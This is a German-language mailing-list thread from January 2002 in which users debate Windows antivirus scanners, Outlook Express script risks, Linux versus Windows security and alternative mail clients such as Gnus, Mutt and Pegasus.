Hallo, ich bin ziemlich überrascht über dieses Mail. McAfee funktioniert auf Desktops problemlos und sauber. Egal ob 98/NT oder 2000 (von ME rede ich nicht, das hat andere Probleme und über XP kann ich nichts sagen). F-Prot läuft ebenfalls - wie du erwähnt hast - sowohl automatisch wie manuell problemlos. Auch Pcillin macht nichts negatives. Norton ist etwas anderes, weil es immer als Allroundtool verkauft wird, aber schwer ins System eingreift. Symantec-Tools sind bei mir und in der Firma nicht mehr zu sehen. Beste grüße Andreas -- http://www.jazznrhythm.de http://www.atomicagebayoubeat.com

Jörg Zimmermann

5 Jan 5 Jan

16:42

Hi Ratti, On 4 Jan 2002 at 23:12, Ratti wrote:

...

Martin Neuditschko:

...
Und ich bin immer noch sicher, daß ca. 50% der Windowsuser keinen Antivirus laufen haben.

Schätzungsweise 90% haben keinen Virenscanner.

Warum auch?

Genau, wofür brauche ich schon Sicherheitsgurte im Auto..

...

Man sagt seinem Outlook, es soll keine Scripte ausführen - oder nimmt einen anderen MUA.

achsoo, ja dann ist ja alles gut. Im Hinblick auf die Bedienbarkeit und den Komfort, ist OE unübertroffen. LEIDER. Wenn man allerdings Sicherheitsaspekte berücksichtigt, ist es eine Katastrophe. Du wär'st der ERSTE der OE dazu gebracht hat KEINE scripte auszuführen. Du kannst Dich auf den Kopfstellen, es gibt KEINE Möglichkeit OE dazu zu bringen nichts mehr auszuführen. Wenn Du magst, sende ich Dir mal ne HTML-Mail.. Einen anderen MUA, ja gerne. Nenne mir eine ernsthafte Alternative. Netscape? Ich hab keine Zeit immer ewigkeiten zu warten bis das Monster gestartet ist oder sich bequemt mal ein neues Fenster aufzumachen. OE ist schneller UND kann IMAP. Alle anderen MUA's kannst Du unter diesem Aspekt vergesssen. Es sei denn Du möchtest Dir einen kaufen, z.B. Mullbery. Achja, ich quäle mich hier mit Pegasus rum, der Ansatz ist sehr gut, leider macht das Teil aber zu viele Probleme.

...

Man nimmt nicht den IE, oder updatet ihn. Dafür gibt es die Updatefunktion.

Erklär mal was Du damit meinst.

...

Bleibt das Einfallstor "Download von Programmen". Das ist aber bei allen OSsen gleich hoch - ich zumindest bin auf meinem Linux-Rechner nicht in der Lage, zu erkennen, was ich mir da mit make install oder rpm draufschiebe - zwangsläufig als root. Liest du alle Quelltexte

Wieso als root?? Als root brauchst Du in der Regel bestenfalls das 'make install' zu machen.

...

durch, die du kompillierst?

Das brauche ich garnicht, Stichwort 'MD5 fingerprint of all files in this directory'. Ich könnte aber, wenn ich will. Der grosse Vorteil von open source, ist ja gerade das die Quellen einsehbar sind, da liegen Welten zwischen M$ und Open Source. Ausserdem kommt es ja wohl immer darauf an, auf welchem System man sich gerade befindet. Wenn ich eine Server für viele user aufsetze, kommt nur ausgewähltwe Software drauf. Und bei wirklich wichtigen Systemen gibt es Admins die dann auch mal ein paar Tage Zeit haben um zu schecken ob die Quellen auch OK sind. Alles eine Frage der Wichtigkeit.

...

Natürlich ist das Risiko unter Win aufgrund der beschissenen Systemarchitektur und der teilweise merkwürdigen Userschaft ungleich größer - aber wie groß ist es "in Absolut"?

2% zu 98%. Oder habe ich zu M$ zu optimistisch beurteilt?

...

Ich habe in den letzten Jahren keinen Windows-Virus zu Gesicht bekommen. Ausnahme: Besagter Mail/VBS/ActiveX-Blödsinn, und der ist leicht zu verhindern, siehe oben.

Ich bezweifle das unter M$ irgendetwas leicht zu verhindern ist. Du bist diesem System einfach ausgeliefert.

...

Für den Verdachtsfall genügt ein simpler Scanner wie F-Prot, der manuell gestartet wird.

Er sollte aktuell sein. Dazu reicht es nicht aus einmal im Monat nach neuen Virensignaturen ausschau zu halten.

...

Dazu gibt es nunmal keine Alternative. _Jeder_ mir bekannte Virenscanner, der sich unter Win ins System hängt, richtete noch immer mehr Schaden an, als er nützte. Da läuft nix mehr stabil, und

Kann ich nicht bestätigen. Bei uns lauf die Scanner schon stabil.

...

genau deswegen habe ich völlig problemlos seit etlichen Jahren keinen Virenscanner - sowohl privat als auch in der Firma (Dort gibt es allerdings auch keine User Marke "Ich klick alles").

Wie aussergewöhnlich, meiner Erfahrung nach, klicken von 10 Anwendern 7 auf alles was sich nicht schnell genug in Sicherheit bringen kann. mit freundlichen Grüßen Jörg Zimmermann ------------------------------------------- .xsiteing agentur für netzkommunikation 42117 wuppertal - friedrich-ebert-str. 141b tel: 0202/3097070 - fax: 0202/3097072

Christian Schneider

16:54

* Jörg Zimmermann wrote:

...

[..] achsoo, ja dann ist ja alles gut. Im Hinblick auf die Bedienbarkeit und den Komfort, ist OE unübertroffen. [..] Wenn du mit "Bedienbarkeit" die Konfiguration meinst, hast du evtl. recht.

...

Einen anderen MUA, ja gerne. Nenne mir eine ernsthafte Alternative. Netscape? Ich hab keine Zeit immer ewigkeiten zu warten bis das Monster gestartet ist oder sich bequemt mal ein neues Fenster aufzumachen. OE ist schneller UND kann IMAP. Alle anderen MUA's kannst Du unter diesem Aspekt vergesssen. [..] [ ] Du kennst Gnus[1]

Footnotes: [1] http://www.gnus.org/ -- http://3d-crew.com "To segfault is human; to bluescreen moronic."

Jörg Zimmermann

17:20

Hi, On 5 Jan 2002 at 16:54, Christian Schneider wrote:

...

* Jörg Zimmermann wrote:

...
[..] achsoo, ja dann ist ja alles gut. Im Hinblick auf die Bedienbarkeit und den Komfort, ist OE unübertroffen. [..] Wenn du mit "Bedienbarkeit" die Konfiguration meinst, hast du evtl. recht. Ich hasse OE, aber ich bin noch fauler.

Gnus has been reported to work under VMS, OS/2, and Microsoft Windows NT 3.51, as well as Unix Sorry, W2k ist not supported. :( Oder habe ich da was übersehen ? mit freundlichen Grüßen Jörg Zimmermann ------------------------------------------- .xsiteing agentur für netzkommunikation 42117 wuppertal - friedrich-ebert-str. 141b tel: 0202/3097070 - fax: 0202/3097072

Ratti

20:40

Hallo, Ratti:

...

...
Man sagt seinem Outlook, es soll keine Scripte ausführen - oder nimmt einen anderen MUA.

Jörg Zimmermann:

...

achsoo, ja dann ist ja alles gut. Im Hinblick auf die Bedienbarkeit und den Komfort, ist OE unübertroffen. LEIDER. Wenn man allerdings Sicherheitsaspekte berücksichtigt, ist es eine Katastrophe. Du wär'st der ERSTE der OE dazu gebracht hat KEINE scripte auszuführen. Du kannst Dich auf den Kopfstellen, es gibt KEINE Möglichkeit OE dazu zu bringen nichts mehr auszuführen. Wenn Du magst, sende ich Dir mal ne HTML-Mail..

Das hätte mich schon interessiert, "leider" arbeite ich nicht mehr mit Windows, sondern mit Linux und evolution. Schick mir deine HTML-Mail doch bitte trotzdem mal, ich würde das gerne mal testen. Nach meinem Kenntnisstand gibt es keinen Wurm, der sich trotz der Einstellung "Sichere Zone" aktivieren kann.

...

...
Man nimmt nicht den IE, oder updatet ihn. Dafür gibt es die Updatefunktion.

Erklär mal was Du damit meinst.

Man nimmt nicht den IE - sondern mozilla. Und man Updatet regelmässig sein System via "Windows update".

...

...
Bleibt das Einfallstor "Download von Programmen". Das ist aber bei allen OSsen gleich hoch - ich zumindest bin auf meinem Linux-Rechner nicht in der Lage, zu erkennen, was ich mir da mit make install oder rpm draufschiebe - zwangsläufig als root. Liest du alle Quelltexte

Wieso als root?? Als root brauchst Du in der Regel bestenfalls das 'make install' zu machen.

Natürlich, das langt ja auch schon. Was da alles an Meldungen durchraddelt... Ne, ich würde nicht Windows und Linux gleichsetzen. Windows ist unsicherer. Punkt. Aber es muß auch kein offenes Scheunentor sein, da kann man was machen. Und wenn ich ständig Software aus dem Web hole und hier rumkompiliere wie ein Weltmeister, um das alles zu lernen, dann ist _mein_ Linux genauso sicher wie _mein_ Windows, weil es bei beiden die gleiche Quelle gibt: Fremde Software, downgeloadet von irgendwelchen Homepages.

...

Das brauche ich garnicht, Stichwort 'MD5 fingerprint of all files in this directory'.

OK, das ist neu für mich. Gut, daß es sowas gibt. Aber was besagt das über die Systemsicherheit, wenn viele Linux-Anwender das, wie ich, nicht kennen und beachten?

...

Ich könnte aber, wenn ich will. Der grosse Vorteil von open source, ist ja gerade das die Quellen einsehbar sind, da liegen Welten zwischen M$ und Open Source.

"Ich könnte in den Quelltext gucken" ist ein sehr großer Vorteil von OpenSource, was viele Aspekte angeht. Was das einschummeln von Viren, Würmern oder Trojanern angeht, ist "ich könnte" kein Schutz, nur "ich habe". Genausogut "könnte" ich keine Programme starten, die Virenverseucht sind. ;-)

...

Ausserdem kommt es ja wohl immer darauf an, auf welchem System man sich gerade befindet.

Was anderes sag ich ja nicht. Wenn ich meinem technisch beschränkten Nachbarn einen Rechner aufsetze, dann käme da vermutlich ein Virenscanner drauf.

...

...
Für den Verdachtsfall genügt ein simpler Scanner wie F-Prot, der manuell gestartet wird.

Er sollte aktuell sein. Dazu reicht es nicht aus einmal im Monat nach neuen Virensignaturen ausschau zu halten.

Ja. Und selbst, wenn man das tut, ist man niemals so aktuell wie der Virus, logisch. Das Update des Scanners muss ja immer erst noch programmiert werden, geschweige denn daß man von dem Virus erfährt, das Update bekommt, einspielt - und dann muß es auch noch fehlerfrei sein... Schlußfolgerung: Man ist ja gar nicht sicher. Also lieber den Rechner ordentlich konfigurieren und bedienen.

...

...
Dazu gibt es nunmal keine Alternative. _Jeder_ mir bekannte Virenscanner, der sich unter Win ins System hängt, richtete noch immer mehr Schaden an, als er nützte. Da läuft nix mehr stabil, und

Kann ich nicht bestätigen. Bei uns lauf die Scanner schon stabil.

Welcher?

...

auch in der Firma (Dort gibt es allerdings auch keine User Marke "Ich klick alles").

Wie aussergewöhnlich, meiner Erfahrung nach, klicken von 10 Anwendern 7 auf alles was sich nicht schnell genug in Sicherheit bringen kann.

Ja, normalerweise. Stimmt. ;-) Wir arbeiten mit Macs, die Win-Kisten stehen bei uns Techies, damit wir unsere Websites unter den drei gängigsten OSsen angucken können. Gruß, Ratti

Jörg Zimmermann

6 Jan 6 Jan

19:00

Hi Ratti, On 5 Jan 2002 at 20:40, Ratti wrote:

...

Das hätte mich schon interessiert, "leider" arbeite ich nicht mehr mit Windows, sondern mit Linux und evolution. Schick mir deine HTML-Mail doch bitte trotzdem mal, ich würde das gerne mal testen. Nach meinem Kenntnisstand gibt es keinen Wurm, der sich trotz der Einstellung "Sichere Zone" aktivieren kann.

per PM.

...

Und man Updatet regelmässig sein System via "Windows update".

Und Du weisst genau, was das "Windows update" so alles treibt??

...

Ne, ich würde nicht Windows und Linux gleichsetzen. Windows ist unsicherer. Punkt. Aber es muß auch kein offenes Scheunentor sein,

Nein, man kann Windows durchaus sicher machen. Nur ist dazu ein nicht unerheblicher Aufwand und Fachkenntnis notwendig, welche bei dem normalen user nicht vorausgesetzt werden kann.

...

da kann man was machen. Und wenn ich ständig Software aus dem Web hole und hier rumkompiliere wie ein Weltmeister, um das alles zu lernen, dann ist _mein_ Linux genauso sicher wie _mein_ Windows,

Dafür richtet man sich ein kleines Testsystem auf einer extra Partition ein, sofern man keinen dedizierten Rechner dafür verwenden kann.

...

OK, das ist neu für mich. Gut, daß es sowas gibt. Aber was besagt das über die Systemsicherheit, wenn viele Linux-Anwender das, wie ich, nicht kennen und beachten?

es wird immer etwas geben was Du oder Wir nicht kennen. Naja, dann lernst Du es eben irgendwann kennen. Dafür gibt es ja Maillinglisten, Newsgroups... In Anlehnung zu diesem Computerspruch gilt auch hier, 'Das Internet hilft Dir Dich vor den Gefahren zu schützen, die Du ohne Internet nicht hättest'.

...

"Ich könnte in den Quelltext gucken" ist ein sehr großer Vorteil von OpenSource, was viele Aspekte angeht. Was das einschummeln von Viren, Würmern oder Trojanern angeht, ist "ich könnte" kein Schutz, nur "ich habe". Genausogut "könnte" ich keine Programme starten, die Virenverseucht sind. ;-)

Die Frage lautet: Wie hoch ist der wirtschaftliche Aufwand ein System sicher zu machen und in welchem Verhältniss steht das zum erwarteten Nutzen? Beispiel: a.) Ich habe einen privaten Rechner mit Linux zum surfen und spielen. Ich mache grundsätzlich keine Geldgeschäfte über das Internet. - Da kann ich einfach eine Standard Distri nehmen und gut is. b.) Ich richte in einer Firma einen Mailserver für 200 user ein. Der Server macht nur Mail. Da das System extrem stabil funktioniert, wird es extensiv für die Kommunikation benutzt. Da gibt es kein SuSE oder RED Hat oder ... Da gibt es Debian, und zwar NUR das, was benötigt wird. Und wenn es ganz sicher sein soll (siehe oben den Punkt Wirtschaftlichkeit), dann musst Du selber kompilieren und den Quellcode checken. Du darfst davon ausgehen, das der Administrator von, einer UNI z.B. C && C++ beherrrscht. Und wenn der postfix oder sendmail installiert, hat er die Quellen gesichtet. Und da das hunderte oder gar tausende machen, und der Quell code zwar auf öffentlichen Server zur Verfügung gestellt wird, aber durchaus vor Veränderungen geschützt ist, kannst Du Dich da sicherer fühlen/sein als bei irgendeiner anderen Methode an Software zu gelangen. Stichpunkt, Viren auf Installations CD's.

...

Und selbst, wenn man das tut, ist man niemals so aktuell wie der Virus, logisch. Das Update des Scanners muss ja immer erst noch programmiert werden, geschweige denn daß man von dem Virus erfährt, das Update bekommt, einspielt - und dann muß es auch noch fehlerfrei sein... Schlußfolgerung: Man ist ja gar nicht sicher. Also lieber den Rechner ordentlich konfigurieren und bedienen.

sicher ist nur der Tod. Wie gesagt, es kommt immer auf die Verhältnissmässigkeit an. Wenn ich in D-land bin muss gehe ich nicht zur Grippeimpfung, reise ich in die Tropen, lasse ich mich gegen alles mögliche impfen, es kommt halt immer drauf an.

...

...
...
Dazu gibt es nunmal keine Alternative. _Jeder_ mir bekannte Virenscanner, der sich unter Win ins System hängt, richtete noch immer mehr Schaden an, als er nützte. Da läuft nix mehr stabil,

Jede Software, welche auf ein M$-OS installiert wird, macht das System instabiler; und machen wir uns nichts vor, das gilt auch für Linux. Nur ist es da nicht so kritisch wie bei M$.

...

...
Kann ich nicht bestätigen. Bei uns lauf die Scanner schon stabil.

Welcher?

McAfee

...

Wir arbeiten mit Macs, die Win-Kisten stehen bei uns Techies, damit wir unsere Websites unter den drei gängigsten OSsen angucken können.

joh, kenn ich. Das ganze M$ Geraffel und MAC und Linux und dann alle möglichen Browser und Versionen und ... Aaarrgh, mein Kollege macht mich waahnsinnig mit dem Zeug. mit freundlichen Grüßen Jörg Zimmermann ------------------------------------------- .xsiteing agentur für netzkommunikation 42117 wuppertal - friedrich-ebert-str. 141b tel: 0202/3097070 - fax: 0202/3097072

Thomas Bendler

17:59

Hi, On Sam, 05 Jan 2002, Jörg Zimmermann sent incredible lines:

...

On 4 Jan 2002 at 23:12, Ratti wrote: [...]

...
Schätzungsweise 90% haben keinen Virenscanner. Warum auch? Genau, wofür brauche ich schon Sicherheitsgurte im Auto..

Kann man nicht vergleichen, das eine ist ein materieller Schaden, das andere ein gesundheitlicher, da sollte man schon differenzieren. Abgesehen davon hast du einen Virenscanner für Linux? Auch auf Unix Systemen kann man sich theoretisch Viren einfangen, aufgrund der relativ gut ausgebildeten User Schar ist es aber längst nicht das Problem das unter Windows auftaucht.

...

...
Man sagt seinem Outlook, es soll keine Scripte ausführen - oder nimmt einen anderen MUA. achsoo, ja dann ist ja alles gut. Im Hinblick auf die Bedienbarkeit und den Komfort, ist OE unübertroffen. LEIDER. Wenn man allerdings Sicherheitsaspekte berücksichtigt, ist es eine Katastrophe. Du wär'st der ERSTE der OE dazu gebracht hat KEINE scripte auszuführen. Du kannst Dich auf den Kopfstellen, es gibt KEINE Möglichkeit OE dazu zu bringen nichts mehr auszuführen. Wenn Du magst, sende ich Dir mal ne HTML-Mail..

Er sprach aber von Outlook und nicht von Outlook Express. Da sind schon grosse Unterschiede zu finden. Abgesehen lässt sich über den Kompfort trefflich streiten. Da bin ich der Auffassung ist sowohl Outlook als auch Express nichts dolles. Wenn es darum geht zu sagen welchen "MUA" ich mit dem geringsten Lernaufwand bedienen kann mag das durchaus sein.

...

Einen anderen MUA, ja gerne. Nenne mir eine ernsthafte Alternative. [...]

Mutt + Cygwin Tools, Xemacs + GNUS, diverse Python und Tcl Mailer, ..., es gibt diverse Alternativen. Vielleicht gibt es keine die sowenig "Vorbildung" erfordert wie O/OE, alternativen gibt es aber reichlich, auch in Verbindung mit IMAP. Man muss halt bloss ein bisschen suchen und sich mehr in das Werkzeug einarbeiten. Ob man diesen Mehraufwand in Kauf nimmt oder halt mit den Schwächen des O/OE Gespannes lebt bleibt jedem überlassen. [...]

...

...
Bleibt das Einfallstor "Download von Programmen". Das ist aber bei allen OSsen gleich hoch - ich zumindest bin auf meinem Linux-Rechner nicht in der Lage, zu erkennen, was ich mir da mit make install oder rpm draufschiebe - zwangsläufig als root. Liest du alle Quelltexte Wieso als root?? Als root brauchst Du in der Regel bestenfalls das 'make install' zu machen.

Genau das beschreibt er in seiner Mail, rpm -Uvh und make install brauchen meistens root Rechte, ist halt so.

...

...
durch, die du kompillierst? Das brauche ich garnicht, Stichwort 'MD5 fingerprint of all files in this directory'. Ich könnte aber,

Ach, und das lässt sich nicht fälschen wenn ich den Server der es zur Verfügung stellt knacke? Und es gibt auch keine Autoren die einem "böses" wollen?

...

wenn ich will. Der grosse Vorteil von open source, ist ja gerade das die Quellen einsehbar sind, da liegen Welten zwischen M$ und Open Source.

Das ist richtig, es ging aber um die Frage wer macht das? Wenn ich mir die Zeit nehme (bei grösseren Projekten locker mal ein Jahr) kann ich alles nachvollziehen. Das wird sicher auch bei Hochverfügbarkeits Lösungen und extrem Sicherheitskritischen Systemen gemacht, der private Anwender verlässt sich aber wie bei Downloads aus der Parallelwelt darauf, dass das andere schon getan haben.

...

Ausserdem kommt es ja wohl immer darauf an, auf welchem System man sich gerade befindet. Wenn ich eine Server für viele user aufsetze, kommt nur ausgewähltwe Software drauf. Und bei wirklich wichtigen Systemen gibt es Admins die dann auch mal ein paar Tage Zeit haben um zu schecken ob die Quellen auch OK sind. Alles eine Frage der Wichtigkeit.

Siehe oben, mit ein paar Tagen kommt man dort als einzelner nicht weit, da brauchst schon ein grösseres Team mit vielen "Experten", das wird dann aber wieder ein grosser Kostenfaktor (rechne 130 EUR/pro Person). Das leissten sich nur wirklich grosse Firmen.

...

...
Natürlich ist das Risiko unter Win aufgrund der beschissenen Systemarchitektur und der teilweise merkwürdigen Userschaft ungleich größer - aber wie groß ist es "in Absolut"? 2% zu 98%. Oder habe ich zu M$ zu optimistisch beurteilt?

Gehe bei Linux davon aus das mind. 50% der Anwender Anfänger sind. Systemadmins mit mehr als 10 Jahren Berufserfahrung und dem notwendigen Know How findest dort auch äusserst selten, selbst mir fehlen noch 1 1/2 Jahre zum zehnjährigen und ich würde meine Kentnisse nicht als Anfängerhaft bezeichnen ;-)).

...

...
Ich habe in den letzten Jahren keinen Windows-Virus zu Gesicht bekommen. Ausnahme: Besagter Mail/VBS/ActiveX-Blödsinn, und der ist leicht zu verhindern, siehe oben. Ich bezweifle das unter M$ irgendetwas leicht zu verhindern ist. Du bist diesem System einfach ausgeliefert.

Nein, auch wenn ich kein Windows Fan bin so arbeite ich doch mit Leuten zusammen die ihr Windows System gut im Griff haben, es ist halt wie unter Linux/Unix/MacOS/... eine Frage der Erfahrung und des Wissens. Ohne selbiges läuft halt nichts.

...

...
Für den Verdachtsfall genügt ein simpler Scanner wie F-Prot, der manuell gestartet wird. Er sollte aktuell sein. Dazu reicht es nicht aus einmal im Monat nach neuen Virensignaturen ausschau zu halten. [...]

Das lässt sich automatisieren, auch unter Windows. ... may the Tux be with you! =Thomas= -- Thomas Bendler \\:// ml@bendler-net.de Billwiese 22 (o -) http://www.bendler-net.de/ 21033 Hamburg ---ooO-(_)-Ooo--- tel.: 0 177 - 277 37 61 Germany Linux, enjoy the ride ...!

Jörg Zimmermann

19:53

Hi Thomas, On 6 Jan 2002 at 17:59, Thomas Bendler wrote:

...

On Sam, 05 Jan 2002, Jörg Zimmermann sent incredible lines:

...
On 4 Jan 2002 at 23:12, Ratti wrote:

...
Schätzungsweise 90% haben keinen Virenscanner. Warum auch? Genau, wofür brauche ich schon Sicherheitsgurte im Auto..

Kann man nicht vergleichen, das eine ist ein materieller Schaden, das andere ein gesundheitlicher, da sollte man schon differenzieren.

OK, war polemisch, sollte aber nicht wertend sein.

...

Abgesehen davon hast du einen Virenscanner für Linux? Auch auf Unix

nein, welcher wäre denn zu empfehlen?

...

Systemen kann man sich theoretisch Viren einfangen, aufgrund der relativ gut ausgebildeten User Schar ist es aber längst nicht das Problem das unter Windows auftaucht.

Das ist das Hauptproblem, werden wir nicht wirklich lösen können

...

Er sprach aber von Outlook und nicht von Outlook Express. Da sind

Ich hatte gehofft, das würde keinem auffallen;)

...

schon grosse Unterschiede zu finden. Abgesehen lässt sich über den Kompfort trefflich streiten. Da bin ich der Auffassung ist sowohl Outlook als auch Express nichts dolles. Wenn es darum geht zu sagen

Sehe ich anders, ist aber rein subjektiv und damit irrelevant.

...

...
Einen anderen MUA, ja gerne. Nenne mir eine ernsthafte

...

Mutt + Cygwin Tools, Xemacs + GNUS, diverse Python und Tcl Mailer,

Wir sprachen von M$ Systemen.

...

..., es gibt diverse Alternativen. Vielleicht gibt es keine die sowenig "Vorbildung" erfordert wie O/OE, alternativen gibt es aber reichlich, auch in Verbindung mit IMAP. Man muss halt bloss ein bisschen suchen und sich mehr in das Werkzeug einarbeiten. Ob man diesen Mehraufwand in Kauf nimmt oder halt mit den Schwächen des O/OE Gespannes lebt bleibt jedem überlassen.

Ich suche immer noch. O/OE ist inakzeptabel.

...

Ach, und das lässt sich nicht fälschen wenn ich den Server der es zur Verfügung stellt knacke? Und es gibt auch keine Autoren die einem "böses" wollen?

Alles lässt sich fälschen und manipulieren. Darüber können wir nicht diskutieren, ist eben so. Es lässt sich nur über die Verhältnissmäßigkeit diskutieren.

...

Das ist richtig, es ging aber um die Frage wer macht das? Wenn ich mir die Zeit nehme (bei grösseren Projekten locker mal ein Jahr) kann ich alles nachvollziehen. Das wird sicher auch bei Hochverfügbarkeits Lösungen und extrem Sicherheitskritischen Systemen gemacht, der private Anwender verlässt sich aber wie bei Downloads aus der Parallelwelt darauf, dass das andere schon getan haben.

schon richtig, es ist wohl eher eine Frage der Wirtschaftlichkeit.

...

Siehe oben, mit ein paar Tagen kommt man dort als einzelner nicht weit, da brauchst schon ein grösseres Team mit vielen "Experten", das wird dann aber wieder ein grosser Kostenfaktor (rechne 130 EUR/pro Person). Das leissten sich nur wirklich grosse Firmen.

das ist zweifellos richtig.

...

...
...
Natürlich ist das Risiko unter Win aufgrund der beschissenen Systemarchitektur und der teilweise merkwürdigen Userschaft ungleich größer - aber wie groß ist es "in Absolut"? 2% zu 98%. Oder habe ich zu M$ zu optimistisch beurteilt?

Gehe bei Linux davon aus das mind. 50% der Anwender Anfänger sind.

Gehe bei M$ davon aus das mindestens 80% gar nichts wissen wollen. Gehe davon aus das es weiteren 15% egal ist.

...

Systemadmins mit mehr als 10 Jahren Berufserfahrung und dem notwendigen Know How findest dort auch äusserst selten, selbst mir

Leider wahr, liegt aber wohl auch daran, das diese Gebiet noch relativ jung ist. Es wird sich also wohl verbessern.

...

fehlen noch 1 1/2 Jahre zum zehnjährigen und ich würde meine Kentnisse nicht als Anfängerhaft bezeichnen ;-)).

Wohl war.

...

...
Ich bezweifle das unter M$ irgendetwas leicht zu verhindern ist. Du bist diesem System einfach ausgeliefert.

Nein, auch wenn ich kein Windows Fan bin so arbeite ich doch mit Leuten zusammen die ihr Windows System gut im Griff haben, es ist halt wie unter Linux/Unix/MacOS/... eine Frage der Erfahrung und des Wissens. Ohne selbiges läuft halt nichts.

ACK, trotzdem ist man diesem System hilfloser ausgeliefert, und ich glaube auch nicht, daß man sich darüber ernsthaft unterhalten muss... oder?

...

...
...
Für den Verdachtsfall genügt ein simpler Scanner wie F-Prot, der manuell gestartet wird. Er sollte aktuell sein. Dazu reicht es nicht aus einmal im Monat nach neuen Virensignaturen ausschau zu halten.

Das lässt sich automatisieren, auch unter Windows.

Es ist egal womit man das automatisiert, Hauptsache man achtet auf Aktualität. mit freundlichen Grüßen Jörg Zimmermann ------------------------------------------- .xsiteing agentur für netzkommunikation 42117 wuppertal - friedrich-ebert-str. 141b tel: 0202/3097070 - fax: 0202/3097072

Thomas Bendler

7 Jan 7 Jan

17:39

Hi Jörg, On Son, 06 Jan 2002, Jörg Zimmermann sent incredible lines:

...

On 6 Jan 2002 at 17:59, Thomas Bendler wrote: [...]

...
Abgesehen davon hast du einen Virenscanner für Linux? Auch auf Unix nein, welcher wäre denn zu empfehlen?

schau mal bei cert und auf freshmeat vorbei, es gibt wenigstens divers Tools die auf z.B. Raven oder äquivalentes scannen. Ein Allrounder gibt es IMHO nicht, bin mir da aber nicht sicher. [...]

...

...
Mutt + Cygwin Tools, Xemacs + GNUS, diverse Python und Tcl Mailer, Wir sprachen von M$ Systemen.

Ich weiss, ich habe bei einem Kunden ein Windows NT 4.0 SP5 Rechner mit folgender Konfiguration rumstehen: In der Cygwin bash ergibt ein uname -a folgendes: CYGWIN_NT-4.0 HOSTNAME 1.3.2(0.39/3/2) 2001-05-20 23:28 i686 unknown Mutt ist in Version 1.2.5 installiert. XEmacs Version: XEmacs 21.4 (patch 3) "Academic Rigor" (win32) of Thu May 17 2001 on SHALOM GNUS ist in der Version 5.8.8 installiert, VM 6.92 läuft natürlich auch ;-)) Ausserdem ist noch XFree 4.0.1 sowie ghostscript und ghostview installiert. Natürlich kann man auch Python und Tcl unter Windows zum Laufen bringen, alles nur eine Frage der Bereitschaft. Im Prinzip kann man aber auch unter Windows eine Unix-like Umgebung aufbauen.

...

...
..., es gibt diverse Alternativen. Vielleicht gibt es keine die sowenig "Vorbildung" erfordert wie O/OE, alternativen gibt es aber reichlich, auch in Verbindung mit IMAP. Man muss halt bloss ein bisschen suchen und sich mehr in das Werkzeug einarbeiten. Ob man diesen Mehraufwand in Kauf nimmt oder halt mit den Schwächen des O/OE Gespannes lebt bleibt jedem überlassen. Ich suche immer noch. O/OE ist inakzeptabel.

Siehe oben, wenn du die Bereitschaft aufbringst ein bisschen zu konfigurieren und ein bisschen die Kollegen zu verblüffen sind die oben genannten Gespanne eine lustige Angelegenheit. [...]

...

...
Systemadmins mit mehr als 10 Jahren Berufserfahrung und dem notwendigen Know How findest dort auch äusserst selten, selbst mir Leider wahr, liegt aber wohl auch daran, das diese Gebiet noch relativ jung ist. Es wird sich also wohl verbessern.

Tja, da bin ich leider ein bisschen pessimistischer, es gibt heutzutage kaum noch die Bereitschaft sich mit dem System in seinen Grundzügen auseinander zu setzten. Frage mal bei der jungen Generation an Admins, Beratern, ... was es mit einem MBR auf sich hat oder warum es LBA gibt oder was der Unterschied zwischen greedy und non-greedy bei reg-exen ist oder ..., die Antworten sind häufig eine Mischung aus Achselzucken und einem langezogenden "Häääää?". [...]

...

...
Nein, auch wenn ich kein Windows Fan bin so arbeite ich doch mit Leuten zusammen die ihr Windows System gut im Griff haben, es ist halt wie unter Linux/Unix/MacOS/... eine Frage der Erfahrung und des Wissens. Ohne selbiges läuft halt nichts. ACK, trotzdem ist man diesem System hilfloser ausgeliefert, und ich glaube auch nicht, daß man sich darüber ernsthaft unterhalten muss... oder? [...]

Gute Frage, sicher ist man nicht in der Lage den Source Code zu sichten, es hat mich aber doch verblüfft welche Informationen (in Form von Log Einträgen) Windows (bei NT und W2K) an verschiedensten Stellen hinterlegt. Wenn man weiss wo man suchen muss findet man eine ganze Menge an Info's. Gut das Problem bleibt das steckt hinter zig Fenstern und Checkboxen und ich gehöre nicht zu der Gattung die sich ernsthaft damit beschäftigen, man muss es aber der "Feindseite" zu Gute halten das es geht. Viel problematischer finde ich unter Windows allerdings das ich nicht die Möglichkeit habe das System wie unter Unix mit cat|grep|sed|cut|... zu sezieren. Das soll jetzt keine Verteidigung für Windows sein, ich sehe es nur als essenziell an, die Stärken des Gegners zu kennen, anderfalls fällt man bei Diskussionen hinsichtlich der Entscheidung für irgendein OS leicht auf die Nase weil man davon ausgehen kann das die andere Seite wenigstens ihr Stärken kennt ;-)). ... may the Tux be with you! =Thomas= -- Thomas Bendler \\:// ml@bendler-net.de Billwiese 22 (o -) http://www.bendler-net.de/ 21033 Hamburg ---ooO-(_)-Ooo--- tel.: 0 177 - 277 37 61 Germany Linux, enjoy the ride ...!

Sebastian Helms

6 Jan 6 Jan

22:16

Moin Thomas, * Thomas Bendler schrieb am 06 Jan 2002:

...

On Sam, 05 Jan 2002, Jörg Zimmermann sent incredible lines:

...
Einen anderen MUA, ja gerne. Nenne mir eine ernsthafte Alternative. [...]

Mutt + Cygwin Tools, Xemacs + GNUS, diverse Python und Tcl Mailer,

Unter Windows? z.B. Pegasus Gruß, Sebastian -- Do not meddle in the affairs of Wizards, for they are subtle and quick to anger. Sebastian Helms - http://www.helms.sh - mailto:mail@helms.sh (PGP welcome) SuSE-Linux-Mailinglisten-FAQ: http://www.helms.sh/faq/

Alex Klein

7 Jan 7 Jan

00:31

Hallo, * Am 07.01.2002 zauberte Sebastian Helms:

...

Moin Thomas,

* Thomas Bendler schrieb am 06 Jan 2002:

...
On Sam, 05 Jan 2002, Jörg Zimmermann sent incredible lines:

...
Einen anderen MUA, ja gerne. Nenne mir eine ernsthafte Alternative. [...]

Mutt + Cygwin Tools, Xemacs + GNUS, diverse Python und Tcl Mailer,

Unter Windows? z.B. Pegasus

Ist ja jetzt die Version 4.0 draußen. Momentan gibts dafür keine deutsche Sprachunterstützung, aber wen kratzt das, wenn man einen vernünftigen Mailer unter Windows will? -- Gruß Alex -- besser eingebildet ausgeh'n, als ausgebildet eingeh'n ;-) [Claudia Gabel in dag°]

Jörg Zimmermann

10:49

Hi Alex, On 7 Jan 2002 at 0:31, Alex Klein wrote:

...

* Am 07.01.2002 zauberte Sebastian Helms:

...
Moin Thomas,

...
On Sam, 05 Jan 2002, Jörg Zimmermann sent incredible lines:

...
Einen anderen MUA, ja gerne. Nenne mir eine ernsthafte Alternative.

Unter Windows? z.B. Pegasus

